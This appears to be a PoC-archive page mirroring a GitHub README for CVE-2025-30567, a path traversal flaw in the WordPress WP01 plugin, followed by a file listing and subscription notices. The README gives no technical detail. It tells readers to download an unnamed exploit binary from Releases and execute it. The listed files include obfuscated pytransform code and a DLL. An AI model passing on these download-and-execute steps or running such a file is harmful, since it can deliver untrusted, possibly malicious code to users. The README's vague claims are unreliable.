Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-30567 PoC — WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability

Source
https://github.com/KaxuFF/CVE-2025-30567-PoC
Associated Vulnerability
Title:WordPress WP01 plugin <= 2.6.2 - Arbitrary File Download Vulnerability (CVE-2025-30567)
Description:Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP01 WP01 wp01 allows Path Traversal.This issue affects WP01: from n/a through <= 2.6.2.
Description
CVE-2025-30567 - WordPress WP01 < Path traversal
Readme
# CVE-2025-30567 - WordPress WP01 Path Traversal Exploit

![CVE-2025-30567](https://img.shields.io/badge/CVE-2025--30567-red) ![WordPress](https://img.shields.io/badge/WordPress-4.0%2B-blue)

## Overview

Welcome to the CVE-2025-30567 Proof of Concept (PoC) repository. This project demonstrates a path traversal vulnerability in WordPress WP01. The vulnerability allows attackers to access files outside the intended directory structure. This can lead to sensitive data exposure and potentially compromise the integrity of the application.

## Table of Contents

- [Description](#description)
- [Vulnerability Details](#vulnerability-details)
- [Installation](#installation)
- [Usage](#usage)
- [Contributing](#contributing)
- [License](#license)
- [Links](#links)

## Description

CVE-2025-30567 targets the WordPress WP01 plugin. This vulnerability stems from improper input validation, which enables attackers to manipulate file paths. The PoC provided here allows you to test the vulnerability in a controlled environment. Understanding this exploit can help developers patch their applications and secure their systems against potential attacks.

## Vulnerability Details

- **CVE ID:** CVE-2025-30567
- **Affected Software:** WordPress WP01
- **Type:** Path Traversal
- **Severity:** High

### Impact

An attacker can exploit this vulnerability to read arbitrary files on the server. This can lead to:

- Exposure of sensitive information (e.g., configuration files, user data)
- Further exploitation of the server
- Potential data breaches

### Affected Versions

This vulnerability affects all versions of WordPress WP01 prior to the patch release. Users should upgrade to the latest version to mitigate this risk.

## Installation

To set up the PoC, follow these steps:

1. Clone the repository:
   ```bash
   git clone https://github.com/KaxuFF/CVE-2025-30567-PoC.git
   ```

2. Navigate to the project directory:
   ```bash
   cd CVE-2025-30567-PoC
   ```

3. Ensure you have the necessary dependencies installed. You may need to install specific libraries or tools based on your environment.

4. Download the exploit file from the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases). This file needs to be downloaded and executed to test the vulnerability.

## Usage

Once you have the exploit file, follow these steps to use it:

1. Ensure your WordPress WP01 installation is running.
2. Execute the downloaded exploit file:
   ```bash
   ./exploit-file-name
   ```

3. Observe the output. If the vulnerability is present, you will see the contents of sensitive files displayed in the console.

### Example Command

Here is an example command to execute the exploit:

```bash
./exploit-file-name --target http://your-wordpress-site.com
```

Replace `http://your-wordpress-site.com` with the URL of your WordPress installation.

## Contributing

Contributions are welcome! If you would like to help improve this project, please follow these steps:

1. Fork the repository.
2. Create a new branch:
   ```bash
   git checkout -b feature/YourFeature
   ```

3. Make your changes and commit them:
   ```bash
   git commit -m "Add your message here"
   ```

4. Push to the branch:
   ```bash
   git push origin feature/YourFeature
   ```

5. Create a pull request.

Please ensure that your contributions adhere to the coding standards and best practices.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

## Links

For more information, visit the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases) to download the exploit file and access the latest updates. 

Feel free to explore the various topics related to this repository:

- [codeb0ss](https://github.com/topics/codeb0ss)
- [cve-2025](https://github.com/topics/cve-2025)
- [cve-2025-30567](https://github.com/topics/cve-2025-30567)
- [cve-2025-30567-exp](https://github.com/topics/cve-2025-30567-exp)
- [cve-2025-30567-poc](https://github.com/topics/cve-2025-30567-poc)
- [cve-2025-30567-wordpress](https://github.com/topics/cve-2025-30567-wordpress)
- [cves](https://github.com/topics/cves)
- [exploits](https://github.com/topics/exploits)
- [uncodeboss](https://github.com/topics/uncodeboss)
- [wordpress](https://github.com/topics/wordpress)

Thank you for your interest in CVE-2025-30567!
File Snapshot

 [4.0K]  /data/pocs/dbd98ffa281a1da0d10e797185a5b02dccddd024
├── [ 19K]  CVE-2025-30567.py
├── [4.0K]  pytransform
│   ├── [   1]  @
│   ├── [ 11K]  __init__.py
│   ├── [ 15K]  __init__.pyc
│   ├── [ 220]  license.lic
│   ├── [699K]  _pytransform.dll
│   └── [ 476]  pytransform.key
└── [4.3K]  README.md

1 directory, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →